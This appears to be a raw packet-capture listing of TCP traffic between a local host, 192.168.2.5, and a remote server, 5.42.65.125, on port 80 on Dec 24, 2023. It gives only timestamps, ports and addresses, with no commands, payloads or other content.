Dec 24, 2023 10:44:33.789339066 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.789369106 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.789434910 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.789592981 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.789638996 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.789675951 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.789712906 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.789776087 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.789794922 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.789819002 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.789964914 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.790039062 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.790086985 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.790132999 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.790139914 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.790174961 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.790215969 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.790241957 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.790277958 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.790283918 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.790340900 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.790391922 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.790486097 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.790550947 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.790596008 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.790604115 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.790707111 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.790780067 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.790821075 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.790831089 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.790879965 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.790926933 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.790980101 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.791028976 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.791070938 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.791146994 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.791225910 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.791265011 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.791280985 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.791318893 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.791332006 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.791383982 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.791414022 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.791431904 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.791482925 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.791523933 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.791538000 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.791590929 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.791640997 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.791642904 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.791711092 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.791757107 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.792001963 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.792064905 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.792133093 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.792176962 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.792179108 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.792229891 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.792273045 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.792294025 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.792365074 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.792378902 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.792507887 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.792565107 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.792587996 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.792623043 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.792660952 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.792690039 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.792754889 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.792795897 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.792836905 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.792843103 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.792939901 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.792972088 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.792979956 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.793005943 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.793034077 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.793087006 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.793127060 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.793138027 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.793188095 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.793230057 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.793239117 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.793267965 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.793343067 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.793384075 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.793410063 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.793514013 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.793553114 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.793617010 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.793653011 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.793965101 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.794032097 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.794075966 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.794209003 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.794365883 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.794411898 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.794413090 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.794470072 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.795000076 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.795044899 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.795068026 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.795365095 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.795895100 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.796061993 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.796117067 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.796689987 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.796746016 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.797141075 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.797497988 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.797595024 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.797713041 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.798487902 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.798542976 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.798595905 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.799186945 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.799243927 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.799287081 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.799995899 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.800077915 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.800156116 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.801337004 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.801441908 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.802047014 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.802103996 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.802149057 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.802520037 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.802536011 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.802556038 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.802591085 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.803580999 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.803632975 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.803684950 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.804620028 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.804686069 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.804742098 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.805180073 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.805228949 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.805977106 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.806013107 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.806030035 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.806057930 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.806802034 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.806864977 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.806922913 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.807527065 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.807739973 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.807797909 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.808470011 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.808571100 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.808624029 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.809248924 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.809293985 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.809341908 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.810303926 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.810355902 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.811003923 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.811053038 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.811070919 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.811099052 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.811810970 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.811887026 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.811950922 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.812938929 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.812992096 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.813055038 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.813592911 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.813683987 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.813745975 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.814281940 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.814338923 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.814388990 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.815123081 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.815175056 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.815228939 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.815985918 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.816049099 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.816103935 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.816751003 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.816864967 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.816915035 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.817785025 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.817846060 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.817898035 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.818517923 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.818562031 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.818622112 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.819329023 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.819427967 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.819508076 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.820190907 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.820316076 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.821033001 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.821088076 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.821106911 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.821868896 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.821918964 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.821923018 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.822663069 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.822745085 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.822885990 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.822931051 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.823559046 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.823611975 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.823666096 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.824372053 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.824424028 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.825179100 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.825222015 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.825242043 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.826155901 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.826212883 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.826251984 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.826350927 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.827018023 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.827065945 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.827114105 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.827711105 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.827774048 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.827820063 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.828599930 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.828640938 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.828690052 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.829503059 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.829749107 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.830272913 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.830319881 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.830328941 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.830591917 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.831166983 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.831221104 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.831273079 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.832072973 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.832170010 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.832215071 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.832811117 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.832907915 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.832957983 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.833664894 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.833741903 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.833786964 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.834454060 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.834527969 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.834855080 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.835414886 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.835772038 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.836190939 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.836204052 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.836252928 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.836947918 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.837052107 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.837105036 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.837830067 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.837893963 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.838752031 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.838819027 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.838895082 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.839523077 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.839562893 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.839576960 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.840353966 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.840404034 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.840416908 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.840462923 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.841171026 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.841279030 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.841341019 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.841995955 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.842092037 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.842142105 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.842855930 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.842910051 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.842958927 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.843666077 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.843738079 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.845282078 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.845338106 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.845402956 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.845577002 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.845623016 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.845680952 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.845721006 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.846659899 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.846731901 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.846782923 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.847390890 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.847404003 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.847445965 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.848004103 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.848093987 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.849031925 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.849096060 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.849193096 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.849246979 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.849730968 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.849790096 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.850761890 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.850781918 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.850838900 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.851489067 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.851547003 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.851552963 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.851588011 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.852322102 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.852334976 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.852389097 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.853089094 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.853287935 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.853338957 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.853951931 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.854003906 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.854063034 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.854834080 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.854846954 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.854887962 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.855600119 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.855669975 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.856501102 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.856523991 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.856574059 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.856631994 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.857482910 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.857511044 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.857558012 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.858159065 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.858246088 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.858299017 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.858990908 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.859170914 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.859215975 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.859853029 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.859924078 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.859965086 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.860846996 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.860871077 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.860918045 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.861552954 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.861625910 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.861680984 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.862370014 CET	80	49724	5.42.65.125	192.168.2.5
